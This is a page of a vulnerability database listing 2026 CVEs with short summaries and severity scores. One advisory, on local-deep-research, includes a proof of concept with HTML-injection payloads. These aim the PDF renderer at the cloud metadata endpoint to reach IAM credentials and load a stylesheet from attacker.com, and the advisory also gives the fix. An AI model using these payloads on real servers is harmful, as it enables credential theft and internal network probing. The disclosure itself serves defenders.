Skip to main content
CVE-2026-34579 MEDIUM PATCH GHSA This Month

Using a crafted POST request to bug_monitor_add.php, a user with project-level access can add themselves as a monitor for a private issue they do not have access to. Despite displaying an Access Denied error, the application accepts the request and creates a monitor relationship for the private issue. ### Impact Direct access to the private issue remains blocked, but the user will receive email notifications for updates, leading to disclosure of the private issue's metadata and content. ### Patches - 0a93267deba445fb9d15250c16e6fdb1246ffa65 ### Workarounds None ### Credits Thanks to Vishal Shukla for discovering and responsibly reporting the issue.

PHP Information Disclosure
NVD GitHub
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-33052 MEDIUM PATCH GHSA This Month

MantisBT 2.28.0-2.28.1 allows authenticated users with add_profile_threshold permission to create global profiles by tampering with the user_id parameter, bypassing the manage_global_profile_threshold authorization check. An attacker with low-privileged authentication can escalate their profile creation capabilities to global scope via direct parameter manipulation in the profile creation request.

Authentication Bypass
NVD GitHub VulDB
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-1677 MEDIUM This Month

Zephyr RTOS sockets created with IPPROTO_TLS_1_3 can negotiate TLS 1.2 connections when both TLS versions are enabled in Kconfig, because socket-level protocol selection is not propagated to mbedTLS's minimum version enforcement. Applications explicitly requesting TLS 1.3 may silently fall back to TLS 1.2, exposing them to known TLS 1.2 weaknesses such as POODLE or truncation attacks. Remote unauthenticated attackers can exploit this via network-level protocol downgrade during the TLS handshake.

Information Disclosure Zephyr
NVD GitHub VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-28994 MEDIUM PATCH This Month

A use-after-free vulnerability in Apple's Wi-Fi stack allows attackers in a privileged network position to cause denial-of-service via crafted Wi-Fi packets. The vulnerability affects iOS and iPadOS versions prior to 26.5 and 18.7.9, macOS versions prior to 26.5, 15.7.7, and 14.8.7, and tvOS, watchOS versions prior to 26.5. Exploitation requires adjacent network access and specific radio conditions (AC:H) but results in high availability impact with no active public exploitation identified.

Denial Of Service Apple Use After Free Memory Corruption
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2024-0391 MEDIUM PATCH This Month

The check user account lock states feature within the email OTP flow fails to validate user input, allowing an attacker to infer the existence of registered user accounts. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity.

Information Disclosure Wso2 Identity Server Wso2 Open Banking Iam Wso2 Identity Server As Key Manager Email Otp Authenticator +1
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-6146 MEDIUM This Month

Amazon::Credentials for Perl versions through 1.2.0 uses the predictable built-in rand() function to generate 64-bit encryption keys for credential obfuscation, allowing attackers to recover stored credentials through key prediction rather than cryptographic attack. Affects Perl applications that depend on this library to protect AWS credentials and similar secrets in memory or serialized objects. No authentication required; exploitation requires access to the encrypted credential object and knowledge of the rand() seed.

Information Disclosure Amazon
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-8273 MEDIUM This Month

OS command injection in D-Link DNS-320 firmware 2.06B01 allows remote authenticated administrators to execute arbitrary system commands via unsanitized input to multiple CGI functions (cgi_set_host, cgi_set_ntp, cgi_fan_control, cgi_merge_user) in /cgi-bin/system_mgr.cgi. CVSS 5.1 reflects high-privileged access requirement (PR:H) mitigating network-accessible attack vector; however, the ability to inject OS commands via CGI endpoints creates significant risk in multi-user or compromised-admin scenarios. No public exploit code or active exploitation confirmed at time of analysis.

D-Link Command Injection
NVD VulDB GitHub
CVSS 4.0
5.1
EPSS
0.2%
CVE-2026-6956 MEDIUM This Month

Reflected XSS in ATutor's /install/install.php endpoint allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by crafting a malicious URL. Version 2.2.4 is confirmed vulnerable; the product is no longer actively maintained and vendor response to disclosure was unsuccessful, leaving no official patch available.

XSS PHP
NVD VulDB
CVSS 4.0
5.1
EPSS
0.1%
CVE-2026-6909 MEDIUM This Month

Reflected XSS in ATutor's /install/upgrade.php endpoint allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser via a specially crafted URL. The vulnerability affects at least version 2.2.4 and potentially other versions; the product is no longer actively maintained and vendors did not respond with details about the full vulnerable version range. While CVSS 5.1 indicates low severity, the attack requires user interaction (clicking a malicious link) and has limited scope impact.

XSS PHP
NVD VulDB
CVSS 4.0
5.1
EPSS
0.1%
CVE-2026-7308 MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in Sonatype Nexus Repository 3.6.0 through 3.91.x allows authenticated users with upload permissions to inject malicious JavaScript into repository content, which executes in the browsers of any user viewing the affected repository directory via the HTML index page. An attacker can perform unauthorized actions within a victim's session context, including potential data theft or privilege escalation depending on the victim's role. The vulnerability requires user interaction (clicking/viewing the malicious content) and prior repository upload access, limiting but not eliminating real-world risk in multi-tenant or open-source repository environments.

XSS Nexus Repository
NVD VulDB
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-3320 MEDIUM PATCH This Month

Reflected cross-site scripting (XSS) in Cradle eCommerce platform allows unauthenticated remote attackers to execute arbitrary JavaScript in users' browsers via crafted input to the /product/ endpoint. The vulnerability requires user interaction (clicking a malicious link) and affects the latest demo version. A vendor patch is available.

XSS Cradle
NVD
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-3319 MEDIUM PATCH This Month

Reflected XSS in Cradle eCommerce platform allows unauthenticated remote attackers to execute arbitrary JavaScript in user browsers via unsanitized input reflected in the /collection/ endpoint. The vulnerability requires user interaction (clicking a malicious link) but affects the latest demo version with CVSS 5.1 (low-medium severity). No public exploit code or active exploitation has been identified at time of analysis, though a vendor patch is available.

XSS Cradle
NVD
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-3048 MEDIUM PATCH This Month

An authenticated administrator who configures or tests LDAP connectivity in Sonatype Nexus Repository Manager versions 3.0.0 through 3.91.1 may be able to initiate unintended server-side connections when interacting with a malicious LDAP server.

Deserialization Nexus Repository
NVD
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-34087 MEDIUM PATCH This Month

OATHAuth before versions 1.43.7, 1.44.4, or 1.45.2 exposes sensitive information to unauthorized actors through an information disclosure vulnerability accessible to authenticated users via network requests. The vulnerability requires user interaction and results in limited confidentiality impact, affecting deployments where OATHAuth handles two-factor authentication across Wikimedia platforms.

Information Disclosure Oathauth
NVD VulDB
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-34390 MEDIUM PATCH GHSA This Month

Insufficient access control checks in _ProjectUsersAddCommand_ (used in *manage_proj_user_add.php* and REST API endpoint `PUT /project/{id}/users`) allows users having *manage_project_threshold* access level (*manager* by default) to grant project-level *administrator* access to any user (including themselves) in any Project they have *manager* rights in. The normal project-user add form does restrict the selectable access levels to the actor's own project role or below. However, the backend handler still accepts a forged higher access_level value and writes it. ### Impact Privilege escalation. The consequences of the privilege escalation are not as bad as it may sound, because having *administrator* access at Project level is effectively not very different from being *manager*, it does not actually give administrator privileges on the whole MantisBT instance. In particular, it does not let the upgraded user delete the Project or grant them any access to global administrative functions such as managing Users, Projects, Plugins, Custom Fields, etc. ### Patches - 69e0180f180ed5acf48a8d281a73683a7bf32461 ### Workarounds None ### Credits Thanks to the following security researchers for independently discovering and responsibly reporting the issue: - [Dracosec Research Limited](https://dracosec.tech/) (Siu Nam Tang, Chris Chan, Krecendo Hui, William Lam) - Vishal Shukla

Authentication Bypass Privilege Escalation PHP
NVD GitHub VulDB
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-44931 MEDIUM PATCH This Month

Pre-NVD disclosure via oss-security: oss-security mailing list - 2026/05/11. (GitHub) File archive & mirrors How to verify digital signatures OVE IDs What's new Follow @Openwall on Twitter for new release announcements and other news [<prev day] [month] [year] [list] oss-security mailing list - 2026/05/11 malcontent: Disk Space Exhaustion via Globally Accessible D-Bus API (CVE-2026-44931) (Matthias Gerstner <mgerstner@...e.de>) 1 message Powered by blists - more mailing lists Please check out the Open Source Software Security Wiki , which is counterpart to this mailing list . Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guide

Denial Of Service Suse
NVD
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-43979 MEDIUM PATCH GHSA This Month

## Summary `PDFService._markdown_to_html()` constructs an HTML document by interpolating user-controlled values - specifically `title` (sourced from `research.title` or `research.query`) and `metadata` key-value pairs - directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in `ssrf_validator.py`. --- ## Details **Vulnerable code:** `src/local_deep_research/web/services/pdf_service.py`, lines 171-176 ```python # pdf_service.py:171-176 if title: html_parts.append(f"<title>{title}</title>") # ← title is not escaped if metadata: for key, value in metadata.items(): html_parts.append(f'<meta name="{key}" content="{value}">') # ← key/value are not escaped ``` **Data flow trace:** ``` User input: research.query │ ▼ research_routes.py:1321 pdf_title = research.title or research.query │ ▼ research_routes.py:1325-1326 export_report_to_memory(report_content, format, title=pdf_title) │ ▼ pdf_service.py:107 PDFService.markdown_to_pdf(markdown_content, title=pdf_title) │ ▼ pdf_service.py:137 _markdown_to_html(markdown_content, title, metadata) │ ▼ pdf_service.py:172 f"<title>{title}</title>" ← injection point, no escaping │ ▼ pdf_service.py:112 HTML(string=html_content) ← WeasyPrint renders the injected HTML ``` `research.query` is a string submitted by the user via `POST /api/start_research`, stored as-is in the database, and retrieved without any sanitization. When the user triggers `POST /api/v1/research/<research_id>/export/pdf`, this value is embedded unescaped into the HTML document processed by WeasyPrint. **Injection point 1: `<title>` tag breakout** ``` Input: </title><img src="http://169.254.169.254/latest/meta-data/" /> Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title> ``` When WeasyPrint encounters the injected `<img>` tag, it issues an HTTP GET request to the value of `src` by default. **Injection point 2: `<meta>` attribute breakout** ``` Input: " /><link rel="stylesheet" href="http://attacker.com/evil.css Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css"> ``` WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF. --- ## Proof of Concept **Step 1: Log in and submit a research query containing the injection payload** ```http POST /api/start_research HTTP/1.1 Host: localhost:5000 Content-Type: application/json Cookie: session=<valid_session> { "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>", "mode": "quick", "model_provider": "OLLAMA", "model": "llama3" } ``` The response returns a `research_id`, e.g. `"aaaa-bbbb-cccc-dddd"`. **Step 2: After the research completes, trigger PDF export** ```http POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1 Host: localhost:5000 Cookie: session=<valid_session> X-CSRFToken: <csrf_token> ``` **Step 3: Intermediate HTML constructed server-side** ```html <!DOCTYPE html><html><head> <meta charset="utf-8"> <title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title> </head><body> ...report content... </body></html> ``` **Step 4: WeasyPrint issues an outbound HTTP request to the injected URL** Observed in network monitoring (e.g. `tcpdump`) or the target internal service logs: ``` GET /latest/meta-data/iam/security-credentials/ HTTP/1.1 Host: 169.254.169.254 User-Agent: WeasyPrint/... ``` **Lightweight verification (no SSRF environment required):** Set the query to: ``` </title><title>INJECTED ``` The resulting HTML will contain two `<title>` tags and the PDF document metadata title will read `INJECTED`, confirming successful injection. --- ## Impact ### 1. Chained SSRF (High Severity) By injecting `<img src>`, `<link href>`, or `<style>@import url()` tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to: - **Cloud metadata services** (`169.254.169.254`) on AWS, GCP, or Azure - enabling theft of IAM credentials and instance identity documents. - **Internal network services** (`192.168.x.x`, `10.x.x.x`) - enabling reconnaissance and interaction with internal APIs not exposed to the internet. - **Localhost administrative interfaces** - if SSRF protections are only applied at the user-input validation layer. This is an effective bypass of the application's existing SSRF defenses in `ssrf_validator.py`, because WeasyPrint's outbound resource requests are never routed through that validator. ### 2. HTML Document Structure Corruption Injected tags can prematurely close `<head>` and insert arbitrary content into `<body>`, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality. ### 3. CSS Injection (Medium Severity) By injecting `<link>` or `<style>` tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing. ### 4. Affected Scope - All PDF export operations are affected. - The vulnerability is reachable by any authenticated user - no elevated privileges required. - Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability. --- ## Remediation Apply `html.escape()` to all user-controlled values before embedding them in the HTML template inside `_markdown_to_html`: ```python import html if title: html_parts.append(f"<title>{html.escape(title)}</title>") if metadata: for key, value in metadata.items(): html_parts.append( f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">' ) ``` Additionally, consider configuring WeasyPrint with a custom `url_fetcher` that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources: ```python def safe_url_fetcher(url, timeout=10): from ssrf_validator import validate_url if not validate_url(url): raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}") return weasyprint.default_url_fetcher(url, timeout=timeout) html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher) ``` --- *Report generated against commit `f3540fb3` - local-deep-research, branch `main`.* --- ## Maintainer note (2026-04-24) Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to `main`: **#3082** (merged 2026-03-29, shipped in **v1.5.0+**) - closes the HTML-injection sinks: - `html.escape()` now wraps the `title` value in `<title>…</title>` - Same for metadata keys/values in `<meta name="…" content="…">` - Regression tests added in `tests/web/services/test_pdf_service.py` **#3613** (merged 2026-04-24, shipped in **v1.6.0**) - implements the `url_fetcher` recommendation from the Remediation section: - New `_safe_url_fetcher` in `pdf_service.py` delegates to `weasyprint.default_url_fetcher` only after `security.ssrf_validator.validate_url` accepts the URL - Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes - Covers the chained SSRF path through any URL reaching the rendered HTML - markdown body, citations, raw-HTML passthrough via Python-Markdown - Blocked URLs raise `UnsafePDFResourceURLError` (a `ValueError` subclass) so WeasyPrint skips the resource and the render continues - 8 regression tests, including an end-to-end render with `<img src="http://169.254.169.254/…">` embedded in the body **Advisory metadata:** CVSS `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N` (5.0 Moderate), CWEs **CWE-79** + **CWE-918**. **Patched in v1.6.0** - upgrade to v1.6.0 or later to receive both fixes.

Denial Of Service SSRF Microsoft XSS Python
NVD GitHub VulDB
CVSS 3.1
5.0
EPSS
0.0%
CVE-2026-44972 MEDIUM GHSA This Month

GuardDog versions 2.6.0 through 2.9.0 fail to escape terminal control characters in human-readable scan output, allowing malicious packages to inject ANSI or OSC escape sequences that can clear analyst terminals, rewrite CI logs, or inject spoofed content. The vulnerability affects file paths, code snippets, and messages parsed from package content and rendered directly to stdout without sanitization. Remote attackers can exploit this by distributing packages with specially crafted filenames or source code containing escape sequences, and requires only user interaction (running the scanner on the malicious package).

Python Code Injection
NVD GitHub
CVSS 3.1
5.0
EPSS
0.0%
CVE-2026-42886 MEDIUM PATCH This Month

Denial-of-service in Audiobookshelf prior to version 2.32.2 allows authenticated admin users to crash the server by uploading a specially crafted ZIP file to the backup upload endpoint. The vulnerability stems from decompressing ZIP entries without size limits, enabling an attacker to craft a highly compressed archive that consumes gigabytes of memory when extracted, exhausting server resources and triggering an out-of-memory condition.

Denial Of Service Audiobookshelf
NVD GitHub
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-28967 MEDIUM PATCH This Month

Denial-of-service vulnerability in iOS and iPadOS allows network-positioned attackers with high privileges to crash or degrade service availability through insufficient input validation. Apple addressed this with patches in iOS 18.7.7, iPadOS 18.7.7, iOS 26.4, and iPadOS 26.4. EPSS score of 0.02% (5th percentile) indicates very low real-world exploitation probability despite CVSS score of 4.9.

Denial Of Service Apple
NVD
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-34090 MEDIUM PATCH This Month

Wikimedia Foundation CheckUser versions 1.45.0 through 1.45.1 expose sensitive information to unauthorized actors through a flaw in access control, allowing high-privileged users with user interaction to view data they should not access. The vulnerability affects the CheckUser extension used across Wikimedia projects and is confirmed patched in version 1.45.2. EPSS and active exploitation status are not publicly documented, but the low CVSS score (4.8) and requirement for elevated privileges limit real-world impact.

Information Disclosure Checkuser
NVD VulDB
CVSS 4.0
4.8
EPSS
0.0%
CVE-2026-7814 MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in pgAdmin 4 before version 9.15 allows authenticated administrators to execute arbitrary JavaScript in the browsers of other pgAdmin users by crafting malicious PostgreSQL object names (databases, schemas, tables, columns) that are rendered unsafely via innerHTML in the Browser Tree and Explain Visualizer modules. The vulnerability requires administrator privileges and user interaction (navigation to or EXPLAIN execution over the malicious object), limiting real-world exploitation scope despite the network attack vector.

XSS PostgreSQL
NVD GitHub
CVSS 4.0
4.8
EPSS
0.0%
CVE-2026-44581 MEDIUM PATCH GHSA This Month

Cross-site scripting via CSP nonce poisoning in Next.js App Router allows attackers to inject malicious scripts into cached HTML responses when applications process untrusted CSP request headers. Versions 13.4.0-15.5.15 and 16.0.0-16.2.4 are vulnerable; attackers can craft malformed nonce values that escape sanitization and execute arbitrary JavaScript for subsequent cache visitors. No public exploit code identified at time of analysis, but the attack requires no authentication and low user interaction (cache hit by victim), making it practically exploitable in shared hosting and CDN scenarios.

XSS Red Hat
NVD GitHub VulDB
CVSS 3.1
4.7
EPSS
0.0%
CVE-2026-44659 MEDIUM PATCH This Month

Zen Browser prior to version 1.19.12b incorrectly truncates long hostnames in the address bar, displaying only the attacker-controlled subdomain prefix while hiding the actual registrable domain (eTLD+1). This allows attackers to craft malicious URLs with extremely long subdomains that visually impersonate trusted brands, directly compromising the URL bar as a security indicator and enabling phishing and supply-chain attacks. The vulnerability requires user interaction (clicking a malicious link) but affects all users on vulnerable versions. No public exploit code or active exploitation has been identified at this time.

Mozilla Information Disclosure
NVD GitHub
CVSS 3.1
4.7
EPSS
0.0%
CVE-2026-43659 MEDIUM PATCH This Month

A race condition in Apple operating systems allows authenticated local attackers to access sensitive user data with high complexity exploitation. The vulnerability affects iOS 18.7.9 and earlier, iPadOS 18.7.9 and earlier, iOS 26.5 and earlier, iPadOS 26.5 and earlier, macOS Sequoia 15.7.7 and earlier, macOS Sonoma 14.8.7 and earlier, macOS Tahoe 26.5 and earlier, and visionOS 26.5 and earlier. Vendor-released patches are available, and exploitation requires local access with user-level privileges and high technical complexity. The EPSS score of 0.02% and absence from active exploitation databases indicate low real-world exploitation risk despite the high confidentiality impact.

Apple Race Condition Information Disclosure
NVD
CVSS 3.1
4.7
EPSS
0.0%
CVE-2026-28992 MEDIUM PATCH This Month

Memory corruption in Apple operating systems due to a race condition in locking mechanisms allows local authenticated attackers to cause unexpected app termination or potential denial of service. The vulnerability affects iOS 18.7.8 and earlier, iPadOS 18.7.8 and earlier, macOS Sequoia 15.7.6 and earlier, macOS Sonoma 14.8.6 and earlier, macOS Tahoe 26.4 and earlier, tvOS 26.4 and earlier, visionOS 26.4 and earlier, and watchOS 26.4 and earlier. Vendor-released patches are available across all affected platforms, with no public exploit identified at time of analysis.

Apple Race Condition Buffer Overflow
NVD
CVSS 3.1
4.7
EPSS
0.0%
CVE-2026-28830 MEDIUM PATCH This Month

A race condition was addressed with additional validation. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data.

Apple Race Condition Information Disclosure
NVD
CVSS 3.1
4.7
EPSS
0.0%
CVE-2026-42857 MEDIUM This Month

Stored cross-site scripting (XSS) via CSS injection in Open edX Platform allows enrolled students to inject arbitrary CSS into discussion notification emails sent to other users by bypassing insufficient HTML sanitization in the clean_thread_html_body() function. The vulnerability affects all versions prior to the fix commit and enables email tracking through malicious stylesheets, content spoofing, and phishing attacks against recipients who view notification emails.

XSS Python
NVD GitHub
CVSS 3.1
4.6
EPSS
0.0%
CVE-2026-28961 MEDIUM PATCH This Month

Physical access to a locked macOS Tahoe device prior to version 26.5 allows an attacker to view sensitive user information without authentication. The vulnerability has a low EPSS score (0.02%, 6th percentile) and CISA assesses it as non-exploitable in the wild (SSVC exploitation: none), indicating this is a low-probability real-world threat despite the confidentiality impact rating. The fix is available in macOS Tahoe 26.5.

Apple Information Disclosure
NVD VulDB
CVSS 3.1
4.6
EPSS
0.0%
CVE-2026-28963 MEDIUM PATCH This Month

A privacy issue was addressed by removing the vulnerable code. This issue is fixed in iOS 26.5 and iPadOS 26.5. An attacker with physical access may be able to use Visual Intelligence to access sensitive user data during iPhone Mirroring.

Apple Information Disclosure
NVD
CVSS 3.1
4.6
EPSS
0.0%
CVE-2026-42887 MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in Audiobookshelf prior to 2.33.0 allows authenticated administrators to inject malicious HTML and JavaScript into the authLoginCustomMessage field via the /api/auth-settings endpoint, which is then rendered on the login page for all users without sanitization. This enables attackers with admin credentials to capture user credentials, perform account takeover, or redirect users to phishing sites. No public exploit code identified at time of analysis.

XSS Audiobookshelf
NVD GitHub
CVSS 3.1
4.5
EPSS
0.0%
CVE-2026-43895 MEDIUM PATCH This Month

jq versions 1.8.1 and earlier allow local authenticated users to bypass import path validation through NUL byte injection, enabling access to unintended files and potential information disclosure. An attacker with local access can craft a jq script containing embedded NUL bytes in import paths that pass policy validation checks but resolve to arbitrary files on disk via C string operations, circumventing intended access controls.

Information Disclosure Red Hat
NVD GitHub VulDB
CVSS 3.1
4.4
EPSS
0.0%
CVE-2026-42885 MEDIUM PATCH This Month

Authenticated users with upload permission in Audiobookshelf prior to 2.32.2 can enumerate files outside their authorized library folder through a path traversal vulnerability in the POST /api/filesystem/pathexists endpoint. The vulnerability exploits a weak String.startsWith() validation that fails to distinguish between sibling directories with shared prefixes (e.g., /audiobooks and /audiobooks-private), allowing information disclosure about file existence across library boundaries despite authentication requirements. No public exploit code or active exploitation has been identified at time of analysis.

Path Traversal Audiobookshelf
NVD GitHub
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-28917 MEDIUM PATCH This Month

The issue was addressed with improved input validation. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected process crash.

Denial Of Service Apple
NVD VulDB
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-42884 MEDIUM PATCH This Month

Audiobookshelf prior to version 2.32.2 fails to enforce library access controls on the GET /api/collections and GET /api/collections/:id endpoints, allowing authenticated users to enumerate and retrieve collection metadata and book information from libraries they are not authorized to access. An attacker with valid credentials to any library can exploit this privilege escalation to discover sensitive metadata across all libraries in a multi-library installation.

Authentication Bypass Audiobookshelf
NVD GitHub
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-34754 MEDIUM PATCH GHSA This Month

### Impact MantisBT allows an authenticated user to upload attachments to private Issues they are not authorized to access. ### Patches - b262b4d2835b81394d75356dead66e52a6275206 ### Workarounds None. ### Credits Thanks to Vishal Shukla for discovering and responsibly reporting the issue.

Authentication Bypass
NVD GitHub VulDB
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-39869 MEDIUM PATCH This Month

The issue was addressed with improved memory handling. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing an audio stream in a maliciously crafted media file may terminate the process.

Apple Buffer Overflow
NVD
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-28901 MEDIUM PATCH This Month

The issue was addressed with improved memory handling. This issue is fixed in iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected process crash.

Apple Buffer Overflow Ios And Ipados Tvos Visionos +1
NVD VulDB
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-28971 MEDIUM PATCH This Month

The issue was addressed with improved UI handling. This issue is fixed in iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, visionOS 26.5. A malicious iframe may use another website’s download settings.

XSS Apple
NVD VulDB
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-45003 MEDIUM PATCH This Month

OpenClaw before 2026.4.22 allows workspace dotenv files to override connector endpoint hosts for Matrix, Mattermost, IRC, and Synology connectors, enabling local attackers with workspace access to redirect runtime traffic to malicious endpoints. The vulnerability requires local access and user interaction but allows high confidentiality impact through traffic interception. No active exploitation has been identified, but a vendor-released patch is available.

Mattermost Synology Information Disclosure
NVD GitHub
CVSS 4.0
4.1
EPSS
0.0%
CVE-2026-44992 MEDIUM PATCH This Month

OpenClaw versions 2026.4.5 through 2026.4.19 allow local attackers with user privileges to redirect credentialed MiniMax API requests to attacker-controlled servers via environment variable injection in workspace dotenv files, exposing MiniMax API keys in Authorization headers. The vulnerability requires user interaction (opening a malicious workspace) and local access but achieves high confidentiality impact by exfiltrating sensitive API credentials.

Code Injection Openclaw
NVD GitHub VulDB
CVSS 4.0
4.1
EPSS
0.0%
CVE-2026-44582 LOW PATCH GHSA Monitor

Cache poisoning in Next.js React Server Component responses allows attackers to poison shared cache entries through collisions in the _rsc cache-busting mechanism, potentially serving incorrect response variants to users. The vulnerability affects Next.js versions 13.4.6 through 15.5.15 and 16.0.0 through 16.2.4 in deployments using shared caches with insufficient response partitioning. No public exploit code or active exploitation has been identified at time of analysis, though the low CVSS score (3.7) reflects the requirement for specific cache architecture conditions and lack of confidentiality impact.

Information Disclosure
NVD GitHub VulDB
CVSS 3.1
3.7
EPSS
0.0%
CVE-2026-44572 LOW PATCH GHSA Monitor

Cache poisoning in Next.js middleware redirect handling allows attackers to inject a malicious x-nextjs-data request header, causing middleware to replace the standard Location header with an internal x-nextjs-redirect header that browsers ignore. When deployed behind a CDN or reverse proxy that caches 3xx responses without varying on this header, a single attacker request can poison the cached redirect, resulting in denial of service for that redirect path for all subsequent visitors until cache expiration. Affects Next.js versions 12.2.0-15.5.15 and 16.0.0-16.2.4; vendor-released patches available in 15.5.16 and 16.2.5.

Denial Of Service
NVD GitHub VulDB HeroDevs
CVSS 3.1
3.7
EPSS
0.0%
CVE-2026-44474 LOW PATCH GHSA Monitor

Ella Core fails to enforce 3GPP TS 33.501 §6.9.5.1 security rules, allowing concurrent NAS Security Mode Command and N2 handover procedures that produce KgNB key mismatches between UE and target gNB, causing handover failures. Exploitation requires a stalled gNB combined with a re-registration race condition. Vendor-released patch: version 1.10.0.

Information Disclosure
NVD GitHub
CVSS 3.1
3.7
EPSS
0.0%
CVE-2026-28957 LOW PATCH Monitor

An issue with app access to camera metadata was addressed with improved logic. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, visionOS 26.5. An app may be able to capture a user's screen.

Authentication Bypass Apple
NVD
CVSS 3.1
3.3
EPSS
0.0%
CVE-2026-28910 LOW PATCH Monitor

Improper permissions checking in macOS before version 26.4 allows a malicious app with local user privileges to access arbitrary files without user interaction, potentially exposing sensitive data. The vulnerability has a low EPSS score (0.01%) and no confirmed active exploitation, making it a low-priority but real local privilege escalation risk for systems where untrusted applications may execute.

Authentication Bypass Apple
NVD
CVSS 3.1
3.3
EPSS
0.0%
CVE-2026-8276 LOW PATCH Monitor

Integer coercion error in bettercap's MySQL Server module allows remote attackers to trigger information disclosure through malformed MySQL handshake packets. Versions up to 2.41.5 are affected. The vulnerability requires high attack complexity and has no impact on confidentiality, integrity, or service availability per CVSS 4.0 scoring (VA:L indicates only availability of a non-critical resource), but the described integer manipulation coupled with CWE-189 (numeric errors) suggests potential for partial data exposure or undefined behavior in packet parsing.

Information Disclosure
NVD GitHub VulDB
CVSS 4.0
2.9
EPSS
0.0%
CVE-2026-44658 LOW PATCH Monitor

Zen Browser prior to 1.19.12b fails to validate item links within RSS/Atom feeds, allowing high-privileged users to inject malicious URLs that bypass feed URL restrictions and are opened as trusted tabs. An attacker with administrative or high privileges can craft a malicious RSS feed containing non-HTTP(S) links that are processed without validation and opened with elevated trust, potentially enabling script injection or protocol handler abuse.

Mozilla Information Disclosure
NVD GitHub
CVSS 3.1
2.4
EPSS
0.0%
CVE-2026-34089 LOW PATCH Monitor

Cross-site scripting (XSS) vulnerability in Wikimedia Scribunto 1.45.0 through 1.45.1 allows authenticated users to inject malicious scripts that may be executed in the context of other users' browsers, potentially compromising session security and enabling unauthorized actions on affected wiki installations. The vulnerability requires login credentials and elevated attack complexity but carries low availability impact; CVSS 2.3 reflects limited real-world threat when combined with the authentication requirement.

XSS Scribunto
NVD
CVSS 4.0
2.3
EPSS
0.0%
CVE-2026-42865 LOW PATCH Monitor

Cross-account email event leakage in Inbox Zero prior to 2.29.3 allows authenticated users of the cleaner feature to receive thread events intended for other authenticated accounts via a shared Redis subscription listener. The vulnerability requires both accounts to be actively using the cleaner feature simultaneously and affects only confidentiality of email metadata, with low attack complexity but requiring prior authentication and precise timing.

Redis Information Disclosure
NVD GitHub VulDB
CVSS 4.0
2.3
EPSS
0.0%
Prev Page 7 of 8 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy